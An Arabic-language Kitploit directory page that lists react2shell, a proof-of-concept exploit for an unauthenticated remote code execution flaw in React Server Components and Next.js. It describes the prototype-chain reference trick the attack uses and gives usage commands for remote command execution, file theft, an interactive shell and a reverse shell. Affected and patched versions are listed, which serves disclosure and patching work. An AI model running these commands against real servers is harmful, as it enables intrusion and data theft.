Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
react2shell — react2shell - CVE-2025-55182 (Next.js: CVE-2025-66478) - بدون مصادقة RCE في React Server Components (Flight Protocol) - PoC Exploit | Kitploit
أدوات/GitHubGitHub/rvzsec/react2shell
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubrvzsec/react2shell

react2shell

react2shell - CVE-2025-55182 (Next.js: CVE-2025-66478) - بدون مصادقة RCE في React Server Components (Flight Protocol) - PoC Exploit

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
react2shell

React2Shell

CVE-2025-55182 (Next.js: CVE-2025-66478)
تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه في مكونات خادم React (بروتوكول Flight) - إثبات الاختراق

الوصف

تقوم مكونات خادم React (بروتوكول Flight) بإلغاء تسلسل بيانات multipart/form-data التي يتحكم بها المهاجم دون التحقق من الوصول إلى سلسلة النموذج الأولي. يؤدي طلب POST واحد غير مصادق عليه مع رأس Next-Action إلى الوصول إلى مُنشئ Function من خلال سلسلة مراجع مُعدّة ($1:__proto__:then + $1:constructor:constructor)، مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد على الخادم.

يؤثر على react-server-dom-{webpack,turbopack,parcel} 19.0.0 - 19.2.0 والمستهلكين النهائيين بما في ذلك موجه تطبيقات Next.js (14.3.0-canary.77+, 15.x, 16.x). مشاريع create-next-app الافتراضية معرضة للخطر.

الاستخدام

root@kitploit:~
git clone https://github.com/rvzsec/react2shell
cd react2shell
pip3 install -r requirements.txt
root@kitploit:~
python3 react2shell.py check    -t <target>
python3 react2shell.py exec     -t <target> -c '<command>'
python3 react2shell.py shell    -t <target>
python3 react2shell.py file     -t <target> -f <remote-path> -o <local-out>
python3 react2shell.py revshell -t <target> --lhost <ip> --lport <port>

الإصدارات المصححة

React 19.0.1 / 19.1.2 / 19.2.1+ - Next.js 15.0.5 / 15.1.9 / 15.2.6 / 15.3.6 / 15.4.8 / 15.5.7 / 16.0.7

الاعتمادات

الكشف الأصلي: Lachlan Davidson (@lachlan2k)

تنزيل الأداة